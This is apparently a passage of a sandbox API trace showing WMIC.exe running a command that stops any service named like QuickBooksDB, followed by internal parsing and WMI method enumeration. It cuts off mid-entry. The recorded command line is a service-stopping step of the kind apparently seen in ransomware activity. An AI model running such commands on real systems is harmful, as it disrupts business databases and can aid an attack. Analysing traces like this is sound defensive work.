[0256.280] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0256.280] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0256.280] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0256.280] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.280] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0256.280] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0256.280] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0256.280] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0256.280] malloc (_Size=0x30) returned 0x2b8580 [0256.280] IUnknown:Release (This=0x21ebd50) returned 0x0 [0256.280] IUnknown:Release (This=0x21e78d0) returned 0x0 [0256.280] IUnknown:Release (This=0x21ea280) returned 0x0 [0256.280] IUnknown:Release (This=0x21e9cc0) returned 0x0 [0256.280] FreeThreadedDOMDocument:IUnknown:Release (This=0x21ebc50) returned 0x1 [0256.280] FreeThreadedDOMDocument:IUnknown:Release (This=0x21e71d0) returned 0x0 [0256.280] free (_Block=0x2b6f70) [0256.281] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice" [0256.281] malloc (_Size=0xe0) returned 0x2bcd30 [0256.281] memcpy_s (in: _Destination=0x2bcd30, _DestinationSize=0xde, _Source=0x3825ee, _SourceSize=0xda | out: _Destination=0x2bcd30) returned 0x0 [0256.281] malloc (_Size=0x18) returned 0x2bca60 [0256.281] malloc (_Size=0x18) returned 0x2bca80 [0256.281] malloc (_Size=0x18) returned 0x2bcaa0 [0256.281] malloc (_Size=0x18) returned 0x2bcac0 [0256.281] malloc (_Size=0x80) returned 0x2b6f70 [0256.281] GetLocalTime (in: lpSystemTime=0x18f7d0 | out: lpSystemTime=0x18f7d0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0xe, wMilliseconds=0x1e7)) [0256.281] _vsnwprintf (in: _Buffer=0x2b6f70, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x18f728 | out: _Buffer="04-28-2020T20:42:14") returned 19 [0256.281] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.281] malloc (_Size=0x96) returned 0x2bce20 [0256.281] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.281] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.281] malloc (_Size=0x96) returned 0x2bcec0 [0256.281] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.281] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.281] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.282] malloc (_Size=0xa) returned 0x2bcae0 [0256.282] lstrlenW (lpString="path") returned 4 [0256.282] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0256.282] malloc (_Size=0xa) returned 0x2bcb00 [0256.282] malloc (_Size=0x8) returned 0x2b7000 [0256.282] free (_Block=0x0) [0256.282] free (_Block=0x2bcae0) [0256.282] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.282] malloc (_Size=0x1c) returned 0x2bcf60 [0256.282] lstrlenW (lpString="Win32_Service") returned 13 [0256.282] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0256.282] malloc (_Size=0x1c) returned 0x2bcf90 [0256.282] malloc (_Size=0x10) returned 0x2bcae0 [0256.282] memmove_s (in: _Destination=0x2bcae0, _DestinationSize=0x8, _Source=0x2b7000, _SourceSize=0x8 | out: _Destination=0x2bcae0) returned 0x0 [0256.282] free (_Block=0x2b7000) [0256.282] free (_Block=0x0) [0256.282] free (_Block=0x2bcf60) [0256.282] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.282] malloc (_Size=0xc) returned 0x2bcb20 [0256.282] lstrlenW (lpString="where") returned 5 [0256.282] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0256.282] malloc (_Size=0xc) returned 0x2bcb40 [0256.282] malloc (_Size=0x18) returned 0x2bcb60 [0256.282] memmove_s (in: _Destination=0x2bcb60, _DestinationSize=0x10, _Source=0x2bcae0, _SourceSize=0x10 | out: _Destination=0x2bcb60) returned 0x0 [0256.282] free (_Block=0x2bcae0) [0256.282] free (_Block=0x0) [0256.282] free (_Block=0x2bcb20) [0256.283] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.283] malloc (_Size=0x3e) returned 0x2bcfc0 [0256.283] lstrlenW (lpString="\"name like '%%QuickBooksDB%%'\"") returned 30 [0256.283] _wcsicmp (_String1="\"name like '%%QuickBooksDB%%'\"", _String2="\"NULL\"") returned -20 [0256.283] lstrlenW (lpString="\"name like '%%QuickBooksDB%%'\"") returned 30 [0256.283] lstrlenW (lpString="\"name like '%%QuickBooksDB%%'\"") returned 30 [0256.283] malloc (_Size=0x3e) returned 0x2bd010 [0256.283] malloc (_Size=0x20) returned 0x2bcf60 [0256.283] memmove_s (in: _Destination=0x2bcf60, _DestinationSize=0x18, _Source=0x2bcb60, _SourceSize=0x18 | out: _Destination=0x2bcf60) returned 0x0 [0256.283] free (_Block=0x2bcb60) [0256.283] free (_Block=0x0) [0256.283] free (_Block=0x2bcfc0) [0256.283] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.283] malloc (_Size=0xa) returned 0x2bcb60 [0256.283] lstrlenW (lpString="call") returned 4 [0256.283] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0256.283] malloc (_Size=0xa) returned 0x2bcb20 [0256.283] malloc (_Size=0x30) returned 0x2b85c0 [0256.283] memmove_s (in: _Destination=0x2b85c0, _DestinationSize=0x20, _Source=0x2bcf60, _SourceSize=0x20 | out: _Destination=0x2b85c0) returned 0x0 [0256.283] free (_Block=0x2bcf60) [0256.283] free (_Block=0x0) [0256.283] free (_Block=0x2bcb60) [0256.283] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 74 [0256.283] malloc (_Size=0x18) returned 0x2bcb60 [0256.283] lstrlenW (lpString="stopservice") returned 11 [0256.283] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0256.283] malloc (_Size=0x18) returned 0x2bcae0 [0256.283] free (_Block=0x0) [0256.283] free (_Block=0x2bcb60) [0256.284] malloc (_Size=0x30) returned 0x2b8600 [0256.284] lstrlenW (lpString="QUIT") returned 4 [0256.284] lstrlenW (lpString="path") returned 4 [0256.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0256.284] lstrlenW (lpString="EXIT") returned 4 [0256.284] lstrlenW (lpString="path") returned 4 [0256.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0256.284] free (_Block=0x2b8600) [0256.284] WbemLocator:IUnknown:AddRef (This=0x1c31390) returned 0x2 [0256.284] malloc (_Size=0x30) returned 0x2b8600 [0256.285] lstrlenW (lpString="/") returned 1 [0256.285] lstrlenW (lpString="path") returned 4 [0256.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0256.285] lstrlenW (lpString="-") returned 1 [0256.285] lstrlenW (lpString="path") returned 4 [0256.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0256.285] lstrlenW (lpString="CLASS") returned 5 [0256.285] lstrlenW (lpString="path") returned 4 [0256.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0256.285] lstrlenW (lpString="PATH") returned 4 [0256.285] lstrlenW (lpString="path") returned 4 [0256.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0256.285] lstrlenW (lpString="/") returned 1 [0256.285] lstrlenW (lpString="Win32_Service") returned 13 [0256.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0256.285] lstrlenW (lpString="-") returned 1 [0256.285] lstrlenW (lpString="Win32_Service") returned 13 [0256.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0256.285] lstrlenW (lpString="Win32_Service") returned 13 [0256.285] malloc (_Size=0x1c) returned 0x2bcf60 [0256.285] lstrlenW (lpString="Win32_Service") returned 13 [0256.285] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0256.285] lstrlenW (lpString="Win32_Service") returned 13 [0256.286] malloc (_Size=0x1c) returned 0x2bcfc0 [0256.286] lstrlenW (lpString="Win32_Service") returned 13 [0256.286] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffed0670 | out: _String=0x0, _Context=0xffffffffffed0670) returned 0x0 [0256.286] lstrlenW (lpString="") returned 0 [0256.286] lstrlenW (lpString="WHERE") returned 5 [0256.286] lstrlenW (lpString="where") returned 5 [0256.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0256.286] lstrlenW (lpString="/") returned 1 [0256.286] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0256.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%QuickBooksDB%%'", cchCount1=28, lpString2="/", cchCount2=1) returned 3 [0256.286] lstrlenW (lpString="-") returned 1 [0256.286] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0256.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%QuickBooksDB%%'", cchCount1=28, lpString2="-", cchCount2=1) returned 3 [0256.286] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0256.286] malloc (_Size=0x3a) returned 0x2bd060 [0256.286] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0256.286] lstrlenW (lpString="/") returned 1 [0256.286] lstrlenW (lpString="call") returned 4 [0256.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0256.286] lstrlenW (lpString="-") returned 1 [0256.286] lstrlenW (lpString="call") returned 4 [0256.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0256.286] lstrlenW (lpString="call") returned 4 [0256.286] malloc (_Size=0xa) returned 0x2bcb60 [0256.286] lstrlenW (lpString="call") returned 4 [0256.286] lstrlenW (lpString="GET") returned 3 [0256.286] lstrlenW (lpString="call") returned 4 [0256.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0256.287] lstrlenW (lpString="LIST") returned 4 [0256.287] lstrlenW (lpString="call") returned 4 [0256.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0256.287] lstrlenW (lpString="SET") returned 3 [0256.287] lstrlenW (lpString="call") returned 4 [0256.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0256.287] lstrlenW (lpString="CREATE") returned 6 [0256.287] lstrlenW (lpString="call") returned 4 [0256.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0256.287] lstrlenW (lpString="CALL") returned 4 [0256.287] lstrlenW (lpString="call") returned 4 [0256.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0256.287] lstrlenW (lpString="/") returned 1 [0256.287] lstrlenW (lpString="stopservice") returned 11 [0256.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0256.287] lstrlenW (lpString="-") returned 1 [0256.287] lstrlenW (lpString="stopservice") returned 11 [0256.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0256.287] lstrlenW (lpString="stopservice") returned 11 [0256.287] malloc (_Size=0x18) returned 0x2bcb80 [0256.287] lstrlenW (lpString="stopservice") returned 11 [0256.287] ??0CHString@@QEAA@XZ () returned 0x18d378 [0256.287] GetCurrentThreadId () returned 0xa48 [0256.287] GetCurrentThreadId () returned 0xa48 [0256.287] ??0CHString@@QEAA@XZ () returned 0x18d148 [0256.288] malloc (_Size=0x8) returned 0x2bcff0 [0256.288] malloc (_Size=0x18) returned 0x2bcba0 [0256.288] malloc (_Size=0x18) returned 0x2bcbc0 [0256.288] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c31390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffcc2950 | out: ppNamespace=0xffcc2950*=0x1c43a98) returned 0x0 [0256.309] free (_Block=0x2bcbc0) [0256.309] CoSetProxyBlanket (pProxy=0x1c43a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0256.310] free (_Block=0x2bcff0) [0256.310] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.310] free (_Block=0x2bcba0) [0256.310] malloc (_Size=0x18) returned 0x2bcba0 [0256.310] IWbemServices:GetObject (in: This=0x1c43a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x18d358*=0x0, ppCallResult=0x0 | out: ppObject=0x18d358*=0x1c6bfa0, ppCallResult=0x0) returned 0x0 [0256.328] free (_Block=0x2bcba0) [0256.328] IWbemClassObject:BeginMethodEnumeration (This=0x1c6bfa0, lEnumFlags=0) returned 0x0 [0256.328] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="StartService", ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x1c6c4a0) returned 0x0 [0256.328] lstrlenW (lpString="StartService") returned 12 [0256.328] lstrlenW (lpString="stopservice") returned 11 [0256.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0256.328] IUnknown:Release (This=0x1c6c4a0) returned 0x0 [0256.329] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="StopService", ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x1c6c4a0) returned 0x0 [0256.329] lstrlenW (lpString="StopService") returned 11 [0256.329] lstrlenW (lpString="stopservice") returned 11 [0256.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0256.329] malloc (_Size=0x70) returned 0x2bd0b0 [0256.329] ??0CHString@@QEAA@XZ () returned 0x18cd08 [0256.329] GetCurrentThreadId () returned 0xa48 [0256.329] IWbemClassObject:GetNames (in: This=0x1c6c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x18cd00 | out: pNames=0x18cd00*="\x01ƀ\x08") returned 0x0 [0256.329] SafeArrayGetLBound (in: psa=0x424ae0, nDim=0x1, plLbound=0x18cd18 | out: plLbound=0x18cd18) returned 0x0 [0256.329] SafeArrayGetUBound (in: psa=0x424ae0, nDim=0x1, plUbound=0x18cd14 | out: plUbound=0x18cd14) returned 0x0 [0256.329] SafeArrayGetElement (in: psa=0x424ae0, rgIndices=0x18ccf4, pv=0x18ccf8 | out: pv=0x18ccf8) returned 0x0 [0256.329] malloc (_Size=0x48) returned 0x2bd130 [0256.330] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1c6c4a0, wszProperty="ReturnValue", ppQualSet=0x18cb48 | out: ppQualSet=0x18cb48*=0x1c313b0) returned 0x0 [0256.330] malloc (_Size=0x18) returned 0x2bcba0 [0256.330] IWbemQualifierSet:Get (in: This=0x1c313b0, wszName="CIMTYPE", lFlags=0, pVal=0x18cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x18cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0256.330] free (_Block=0x2bcba0) [0256.330] malloc (_Size=0x18) returned 0x2bcba0 [0256.330] IWbemClassObject:Get (in: This=0x1c6c4a0, wszName="ReturnValue", lFlags=0, pVal=0x18cc78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x18cb58*=1624992, plFlavor=0x0 | out: pVal=0x18cc78*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x18cb58*=19, plFlavor=0x0) returned 0x0 [0256.330] malloc (_Size=0x18) returned 0x2bcbc0 [0256.330] IWbemQualifierSet:Get (in: This=0x1c313b0, wszName="read", lFlags=0, pVal=0x18cb60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffcc2ac0), plFlavor=0x0 | out: pVal=0x18cb60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffcc2ac0), plFlavor=0x0) returned 0x80041002 [0256.330] free (_Block=0x2bcbc0) [0256.330] malloc (_Size=0x18) returned 0x2bcbc0 [0256.373] IWbemQualifierSet:Get (in: This=0x1c313b0, wszName="write", lFlags=0, pVal=0x18cb60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffcc2ac0), plFlavor=0x0 | out: pVal=0x18cb60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffcc2ac0), plFlavor=0x0) returned 0x80041002 [0256.373] free (_Block=0x2bcbc0) [0256.373] malloc (_Size=0x18) returned 0x2bcbc0 [0256.373] malloc (_Size=0x18) returned 0x2bcbe0 [0256.373] IWbemQualifierSet:Get (in: This=0x1c313b0, wszName="Description", lFlags=0, pVal=0x18cc10*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc64293, varVal2=0x18cc18), plFlavor=0x0 | out: pVal=0x18cc10*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc64293, varVal2=0x18cc18), plFlavor=0x0) returned 0x80041002 [0256.373] free (_Block=0x2bcbe0) [0256.373] malloc (_Size=0x18) returned 0x2bcbe0 [0256.373] lstrlenA (lpString="Not Available") returned 13 [0256.373] malloc (_Size=0x1c) returned 0x2bd180 [0256.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc522f0, cbMultiByte=-1, lpWideCharStr=0x2bd180, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0256.374] free (_Block=0x2bd180) [0256.374] IUnknown:Release (This=0x1c313b0) returned 0x0 [0256.374] malloc (_Size=0x48) returned 0x2bd180 [0256.374] malloc (_Size=0x18) returned 0x2bcc00 [0256.374] malloc (_Size=0x48) returned 0x2bd1d0 [0256.374] malloc (_Size=0x70) returned 0x2bd220 [0256.374] malloc (_Size=0x48) returned 0x2bd2a0 [0256.374] free (_Block=0x2bd1d0) [0256.374] free (_Block=0x2bd180) [0256.374] free (_Block=0x2bd130) [0256.374] free (_Block=0x2bcbc0) [0256.374] free (_Block=0x2bcbe0) [0256.374] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.374] IWbemClassObject:GetMethodQualifierSet (in: This=0x1c6bfa0, wszMethod="StopService", ppQualSet=0x18d278 | out: ppQualSet=0x18d278*=0x1c313b0) returned 0x0 [0256.374] malloc (_Size=0x18) returned 0x2bcbe0 [0256.374] IWbemQualifierSet:Get (in: This=0x1c313b0, wszName="Implemented", lFlags=0, pVal=0x18d288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d416ec396ba, varVal2=0xffc644fb), plFlavor=0x0 | out: pVal=0x18d288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d416ec396ba, varVal2=0xffc644fb), plFlavor=0x0) returned 0x80041002 [0256.374] free (_Block=0x2bcbe0) [0256.374] malloc (_Size=0x18) returned 0x2bcbe0 [0256.375] malloc (_Size=0x18) returned 0x2bcbc0 [0256.375] IWbemQualifierSet:Get (in: This=0x1c313b0, wszName="Description", lFlags=0, pVal=0x18d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffcc2948, varVal2=0xa48), plFlavor=0x0 | out: pVal=0x18d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xa48), plFlavor=0x0) returned 0x0 [0256.375] free (_Block=0x2bcbc0) [0256.375] malloc (_Size=0x18) returned 0x2bcbc0 [0256.375] IUnknown:Release (This=0x1c313b0) returned 0x0 [0256.375] malloc (_Size=0x70) returned 0x2bd130 [0256.375] malloc (_Size=0x70) returned 0x2bd2f0 [0256.375] malloc (_Size=0x48) returned 0x2bd1b0 [0256.375] malloc (_Size=0x18) returned 0x2bcc20 [0256.375] malloc (_Size=0x70) returned 0x2bd370 [0256.375] malloc (_Size=0x70) returned 0x2bd3f0 [0256.375] malloc (_Size=0x48) returned 0x2bd470 [0256.375] malloc (_Size=0x50) returned 0x2bd4c0 [0256.375] malloc (_Size=0x70) returned 0x2bd520 [0256.375] malloc (_Size=0x70) returned 0x2bd5a0 [0256.375] malloc (_Size=0x48) returned 0x2bd620 [0256.375] free (_Block=0x2bd470) [0256.375] free (_Block=0x2bd3f0) [0256.375] free (_Block=0x2bd370) [0256.375] free (_Block=0x2bd1b0) [0256.375] free (_Block=0x2bd2f0) [0256.375] free (_Block=0x2bd130) [0256.375] IUnknown:Release (This=0x1c6c4a0) returned 0x0 [0256.375] free (_Block=0x2bd2a0) [0256.375] free (_Block=0x2bd220) [0256.375] free (_Block=0x2bd0b0) [0256.375] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="PauseService", ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x1c6c4a0) returned 0x0 [0256.376] lstrlenW (lpString="PauseService") returned 12 [0256.376] lstrlenW (lpString="stopservice") returned 11 [0256.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0256.376] IUnknown:Release (This=0x1c6c4a0) returned 0x0 [0256.376] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="ResumeService", ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x1c6c4a0) returned 0x0 [0256.376] lstrlenW (lpString="ResumeService") returned 13 [0256.376] lstrlenW (lpString="stopservice") returned 11 [0256.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0256.376] IUnknown:Release (This=0x1c6c4a0) returned 0x0 [0256.376] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="InterrogateService", ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x1c6c4a0) returned 0x0 [0256.376] lstrlenW (lpString="InterrogateService") returned 18 [0256.376] lstrlenW (lpString="stopservice") returned 11 [0256.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0256.376] IUnknown:Release (This=0x1c6c4a0) returned 0x0 [0256.376] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="UserControlService", ppInSignature=0x18d340*=0x1c6c520, ppOutSignature=0x18d348*=0x1c6ca20) returned 0x0 [0256.376] lstrlenW (lpString="UserControlService") returned 18 [0256.376] lstrlenW (lpString="stopservice") returned 11 [0256.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0256.376] IUnknown:Release (This=0x1c6c520) returned 0x0 [0256.376] IUnknown:Release (This=0x1c6ca20) returned 0x0 [0256.376] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="Create", ppInSignature=0x18d340*=0x1c6e470, ppOutSignature=0x18d348*=0x1c6e970) returned 0x0 [0256.377] lstrlenW (lpString="Create") returned 6 [0256.377] lstrlenW (lpString="stopservice") returned 11 [0256.377] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0256.377] IUnknown:Release (This=0x1c6e470) returned 0x0 [0256.377] IUnknown:Release (This=0x1c6e970) returned 0x0 [0256.377] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="Change", ppInSignature=0x18d340*=0x1c6e1f0, ppOutSignature=0x18d348*=0x1c6e6f0) returned 0x0 [0256.377] lstrlenW (lpString="Change") returned 6 [0256.377] lstrlenW (lpString="stopservice") returned 11 [0256.377] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0256.377] IUnknown:Release (This=0x1c6e1f0) returned 0x0 [0256.377] IUnknown:Release (This=0x1c6e6f0) returned 0x0 [0256.377] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="ChangeStartMode", ppInSignature=0x18d340*=0x1c6c610, ppOutSignature=0x18d348*=0x1c6cb10) returned 0x0 [0256.378] lstrlenW (lpString="ChangeStartMode") returned 15 [0256.378] lstrlenW (lpString="stopservice") returned 11 [0256.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0256.378] IUnknown:Release (This=0x1c6c610) returned 0x0 [0256.378] IUnknown:Release (This=0x1c6cb10) returned 0x0 [0256.378] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, 